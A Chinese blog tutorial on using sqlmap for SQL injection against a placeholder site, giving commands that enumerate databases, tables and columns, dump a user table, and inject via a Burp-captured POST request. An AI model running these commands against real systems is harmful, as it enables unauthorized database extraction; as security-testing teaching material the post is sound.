美文网首页
sqlmap使用

sqlmap使用

作者: 奋斗live | 来源:发表于2019-04-01 21:22 被阅读0次
环境准备:

假设存在sql注入的url是

 http://www.test.com/fu?id=111

一、基于mysql注入

a、sqlmap注入爆数据库
python sqlmap.py -u "http://www.test.com/fu?id=111" --dbs

如下图显示,即爆出数据库信息


image.png
b、查找对应数据库下面的表

这里以上面blog数据库的表为例

python sqlmap.py -u "http://www.test.com/fu?id=111"  -D blog --tables

即可爆出blog数据库中所有的表


image.png
c、爆出对应表的列名

这里以上面的user表为例

python sqlmap.py -u "http://www.test.com/fu?id=111"  -D blog -T user --columns

即可爆出所有的列名


image.png

d、爆出表的所有记录

这里以上面的user表为例

python sqlmap.py -u "http://www.test.com/fu?id=111"  -D blog -T user -C "age,id,name,sex" --dump

即可爆出所有记录


image.png

二、基于post注入

假设对应的sql注入字段是 search_key

a、通过burpsuite截取请求数据
image.png
image.png
b、把此数据保存为test.cookie,名字可随便取

让sqlmap加载此文件,进行注入

sqlmap.py -r test.cookie -p search_key --dbs

其中的 -p 是指定 search_key 为注入参数

相关文章

  • sqlmap使用操作

    安装好sqlmap后,可以用cmd使用sqlmap D: cd sqlmap/sqlmap python sqlm...

  • SQL注入 注入工具sqlmap

    使用 下载sqlmap后,通过命令行cd到sqlmap地址下,打开sqlmap.py(python版本要在2.7以...

  • sqlmap从入门到精通-第七章-7-1 绕过WAF脚本-apo

    7.7 sqlmap使用tamper绕过WAF 7.7.1 tamper简介 1. tamper简介 sqlmap...

  • sqlmap Detection

    --level 共有五个等级,默认为1,sqlmap使用的payload可以在/usr/share/sqlmap/...

  • sqlmap使用

    post 注入: 抓包注入: cookie注入: cookie注入原理: 有些程序员 较懒,直接这么写: 这时候P...

  • sqlmap使用

    sqlmap跑post方式的注入时,若后台对token进行验证并且token值变化,则使用简单的sqlmap -u...

  • sqlmap使用

    常用语句 简单的注入流程 python sqlmap/sqlmap.py -help 注入点:http://tes...

  • sqlmap使用

    1. sqlmap简介 SQLmap是一款用来检测与利用SQL漏洞的注入神器。开源的自动化SQL注入工具,由Pyt...

  • sqlmap使用

    sqlmap是由Python编写的渗透测试工具,主要用来检测sql注入漏洞,是一款功能强大的sql漏洞检测利用工具...

  • sqlmap使用

    环境准备: 假设存在sql注入的url是 一、基于mysql注入 a、sqlmap注入爆数据库 如下图显示,即爆出...

网友评论

      本文标题:sqlmap使用

      本文链接:https://www.haomeiwen.com/subject/pywbbqtx.html